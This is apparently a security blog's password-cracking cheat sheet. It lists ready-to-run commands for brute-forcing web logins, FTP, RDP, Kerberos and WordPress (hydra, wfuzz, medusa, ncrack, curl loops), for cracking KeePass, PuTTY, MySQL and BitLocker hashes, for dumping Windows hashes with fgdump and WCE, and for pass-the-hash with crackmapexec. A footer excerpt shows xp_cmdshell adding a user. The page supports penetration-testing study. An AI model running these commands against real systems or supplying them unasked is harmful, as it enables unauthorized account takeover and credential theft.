Skip to main content

Password Cracking



Good Post: Bruteforcing using Custom Scripts
Crunch:
crunch 8 8 -t Any_Characers -o list.txt

if you want to create something like Bha!!123

crunch 8 8 -t ,@@^^%%%

, = Upper case letter
@=lower case letters
^ = special characters
%= numbers
Generating Wordlist using kwprocessor

this is used for generating random passwords that users might use as a streak on the keyboard
example: qwertyuiop[]\

git clone https://github.com/hashcat/kwprocessor.git

#Create a keyword based on routes users use to create passwords
./kwp basechars/full.base keymaps/en-gb.keymap routes/2-to-16-max-3-direction-changes.route > kwp.txt

Fuzzing for Webpages
wfuzz -c -w Rockyou.txt -z list,txt-php-html -u http://10.10.10.10/admin/FUZZ.FUZ2Z --hc 404,403 -t 100 

#show all responses except 404; -s --> negative responses
gobuster dir --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s 404

#Fuzzing Webpages ; -b negative responses; -k --> ignore certificate errors
gobuster fuzz -k --url http://10.10.10.10/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -b 404

#Fuzzing using dirsearch 
dirsearch -u http://10.10.10.10 -e html,php,txt,asp,aspx -x 404

Fuzzing Webpages using bash

for id in $(seq 1 10000); do echo "http://www.xyz.com/index.php?id=$id" done
Bruteforcing kerberos 

Github Usernames  Github Kerbrute

./kerbrute userenum --dc 10.10.10.10 -d domain.local /usr/share/wordlists/kerberos_enum_userlists/Top_50_Female_Firstnames.Surname.txt
Fuzzing Hosts
wfuzz -w wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.10/ --hc 400 --hh 8193 
Subdomain Brute Force

wfuzz -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

*All Wordlists are from SecLists


Check for Non Existing responses, example 28 Words, so Lets grep out resposes which  gives out 28 Words as output

wfuzz -hw 28 -c -w subdomains-top1mil-5000.txt -H "HOST:FUZZ.redcross.htb" https://redcross.htb

add the found url's to /etc/hosts
SubDomain Bruteforce using wfuzz

wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt –H "HOST:FUZZ.bhanu.notes" –u http://10.10.10.10/ --hc 400,301 -t 50 -c
Cracking Http-Digest Auth

hydra -l adnin -P /usr/share/wordlist/rockyou.txt 10.10.10.10 http-digest /path/
Fuzzing using Wget 

#do not crawl the pages ending with the extensions, -R
wget -nd -r -R html,asp,php,aspx -P wordlist.txt hackingdream.net

# crawl the pages ending with the extensions, -A
wget -nd -r -A doc,pdf,docx,xls -P wordlist.txt hackingdream.net
Cewl for emails in the webpage

cewl -n -e http://10.10.10.10 > emails.txt
Brute Forcing Keypass 

keepass2john keypass.kbdx > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Bruteforcing Passwords - POST Using WFuzz

Intercept the admin login page request after entering Username and password & copy the FORM-LOGIN data

or

Firefox --> go to login page --> hit f12 --> network --> enter creds --> submit --> select POST request on network tab
--> headers tab --> click on "resend" and select "Edit and Resend" --> from there you can find the request body
use it for -d option
wfuzz -c --hh 11 -u "https://intra.redcross.htb/pages/actions.php" -X POST -d "user=FUZZ&pass=FUZZ&action=login" -w top-usernames-shortlist.txt Reference

Bruteforcing Passwords - POST Using WFuzz

wfuzz -X POST -u 'http://10.10.10.10/login.php' -d 'email=FUZZ&password=PASSWORD' -w emaillist --hc 200 -c

wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -X POST -d "user=admin&password=FUZZ&type=login" -w ~/Downloads/Tools/rockyou.txt

wfuzz -c --hw 16 -u "http://10.10.10.10/ui/auth/login" -d "user=admin&password=FUZZ" -z file,rockyou.txt

wfuzz -c -t 64 --basic access-admin:FUZZ -u http://10.10.10.10/api/system/version -w 100k-most-used-passwords-NCSC.txt --hc 401

Cheatsheet Cheatsheet-2 
Brute Forcing Passwords using Curl
for pass in $(cat /usr/share/wordlists/rockyou.txt); do curl -k https://10.10.10.10 -u root:"$pass" ;echo $pass & done -------------------------------------------------------
if [ $# -ne 1 ];then
echo "Usage: ./script <input-file>"
exit 1
fi

while read user pass; do
curl -iL --fail --data-urlencode user="$user" --data-urlencode password="$pass" http://foo.dev/login 1>/dev/null 2>&1
if [ $? -eq 0 ];then
echo "ok"
elif [ $? -ne 0 ]; then
echo "failed"
fi
done < $1 ----------------------------------------- url="http://foo.dev/login" for user in $(userlist_gen); do for pass in $(passlist_gen); do http_code=$(curl -L --data-urlencode user="$user" --data-urlencode password="$pass" "$url" -w '%{http_code}' -o /dev/null -s) if [[ $http_code -eq 302 ]]; then echo "Success: User: '$user' Pass: '$pass'" break 2 fi done done -------------------------------------------- WORKS GOOD ------------------------------------------ url="https://172.23.161.130/console" for pass in $(cat /usr/share/wordlists/rockyou.txt); do http_code=$(curl -k $url -u root:"$pass" -w '%{http_code}' -o /dev/null -s) if [[ $http_code -ne 401 ]]; then echo "Success: User: root, Pass: '$pass'" break 2 else echo "Wrong Password Root:$pass" fi done done
WPSCAN:

wpscan --url http://192.168.0.107 -P Wordlist.txt -U wordlist.txt -t 20

wpscan --url http://10.40.10.10/ -e ap,t,u 
Hydra:

hydra -l admin -P wordlist.txt -v VICTIM_IP ftp

hydra -l username -P password_file.txt -s port -f ip_address request_method /path
hydra -l admin -P 1000_common_passwords.txt -s 8080-f 10.10.10.10 http-get /index.html


For Wordpress:

hydra -L wordlist.txt -P wordlist.txt localhost -V 192.168.0.107 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:invalid"

hydra -l username -P rockyou.txt url.com http-post-form "/portal/xlogin/:ed=^USER^&pw=^PASS^:S=302"
Cracking Web Page Passwords using patator

patator http_fuzz auth_type=basic url=http://FILE0 user_pass=FILE1:FILE2 0=hosts.txt 1=users.txt 2=pass.txt -x ignore:code=401

Cracking Putty Private Key.ppk

sudo apt install putty-tools

#Genrate id_rsa for ssg logi
n, if it asks for password - Password needs to be cracked
puttygen private.ppk -O private-openssh -o id_rsa

putty2john private.ppk > hash

john --format=PuTTY --fork=4 hash -w=wordlist.txt


#Enter the cracked password
puttygen private.ppk -O private-openssh -o id_rsa

Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash
$1$llol$srpNQb9srgHAqNAes0FGC1

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
Cracking bitlocker Recovery key using John


john --format=bitlocker-opencl -mask=?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d[-]?d?d?d?d?d?d target_hashPWDUMP/fgdump: Used to Dump Windows Passwords,  Needs Admin Privileges to work.

you can also use bitcracker 

Cracking Recovery key with JTR


just run fgdump.exe in cmd and hashes get dumped onto a text file.
/etc/shadow Hashes 

if the hashes start with

$1$ - MD5
_  - BSDi Extended DES
$2$ or $2a$ - Blowfish
$5$ - SHA-256
$6$ - SHA-512
Windows Credential Editor(WCE): 

wce64.exe -w
Passing the Hash to login to windows:

pth-winexe

export SMBHASH=Copy_the_NTLM_Hash_FROM_fgdump

pthwinexe -U administrator% //Victim_IP cmd

Pass the Password

crackmapexec IP_Address -u username -d domain_name -p password

crackmapexec 10.10.10.10/24 -u bhanu -d steins -p Welcome@1


Pass the Hash
Bhanu:500:132kjb214vb2jh42v4l324v2432j4v:4332k4b32kj4b32jh4v3243::  #copy the last set of hash

crackmapexec 10.10.10.10/24 -u bhanu -d steins -H 4332k4b32kj4b32jh4v3243 --local 
Password Profiling: 

Creating Wordlists from a webpage or any source.

cewl www.website.com -m 6 -w /root/wordlist-cewl.txt
Password Mutation:

nano /etc/john/john.conf 
$[0-9]$[0-9]        /Adding a rule in John to add 2 numbers after each word

john --wordlist=wordlist-cewl.txt --rules --stdout > mutated_pass.txt
            /Apply these rules to existing passwords
Medusa:
medusa -h VICTIM_IP -u admin -P wordlist.txt -M http -m DIR:/admin -T 20
Ncrack:

ncrack -v -f --user administrator -P wordlist.txt rdp://VICTIM_IP,CL=1
        /Multiple Threads should not be used
LM and NTLM Hashes:
-------------------
NT based till 2003 stored 2 diff hashes -> Lan Manager and NTLan manager

LM Hashing:  weak, password longer than 7 chars are split into 2 strings
-----------
password is converted to uppercase before being hashed. each part is hashed seperately, 
no Salts --> prone to Rainbow tables attack

NTLM Hashing: Started from Windows Vista; SAM
--------------






Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...

Host and Application locally and access it over the internet via ngrock

 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...

Cloud Pentest Cheatsheet - Azure

Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...